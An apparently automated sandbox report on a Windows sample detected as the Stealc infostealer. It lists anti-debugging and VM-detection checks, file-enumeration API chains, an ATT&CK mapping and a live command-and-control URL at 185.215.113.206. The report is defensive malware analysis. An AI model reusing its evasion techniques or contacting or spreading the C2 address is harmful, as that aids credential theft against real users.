              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0255 second address: 51F0280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c popad 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD7F8DB51F9h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0280 second address: 51F0286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0286 second address: 51F028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F028A second address: 51F028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F028E second address: 51F029E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F029E second address: 51F02A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02A2 second address: 51F02B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02B2 second address: 51F02C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8BAA15Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02FF second address: 51F031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FD7F8DB51F9h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F031E second address: 51F03BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA15Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, ax 0x0000000e pushfd 0x0000000f jmp 00007FD7F8BAA15Ah 0x00000014 or esi, 05BB6CA8h 0x0000001a jmp 00007FD7F8BAA15Bh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 mov dx, FF4Ah 0x00000027 pushfd 0x00000028 jmp 00007FD7F8BAA15Bh 0x0000002d or ax, 81EEh 0x00000032 jmp 00007FD7F8BAA169h 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FD7F8BAA15Ch 0x00000041 adc eax, 6E820168h 0x00000047 jmp 00007FD7F8BAA15Bh 0x0000004c popfd 0x0000004d popad 0x0000004e mov ebp, esp 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FD7F8BAA160h 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F03BB second address: 51F03CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8DB51EEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F03CD second address: 51F03F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD7F8BAA169h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F03F3 second address: 51F03F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F03F9 second address: 51F03FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 124B924 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1233D83 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 107F805 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12A6CB6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27491
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-26309
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E418A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E418A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E43910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E43910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E41269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E41250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E4E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E4CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E423A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00E423A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E3DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E42390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00E42390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E3DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E44B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00E44B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E44B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E44B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E4D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_00E4DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E316A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E316A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E316B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00E316B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E51BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00E51BF0
              Source: file.exe, file.exe, 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2264756747.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264756747.0000000000D83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2264756747.0000000000D83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}
              Source: file.exe, 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26295
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26303
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26148
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26168
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26192
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E34A60 VirtualProtect 00000000,00000004,00000100,?0_2_00E34A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E56390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E56390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E56390 mov eax, dword ptr fs:[00000030h]0_2_00E56390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E52AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00E52AD0
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1488, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E546A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_00E546A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00E54610
              Source: file.exe, file.exe, 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: IcProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00E52D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E52B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00E52B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E52A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00E52A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E52C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00E52C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.2177796637.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1488, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.2177796637.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1488, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.phptop100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://185.215.113.206file.exe, 00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
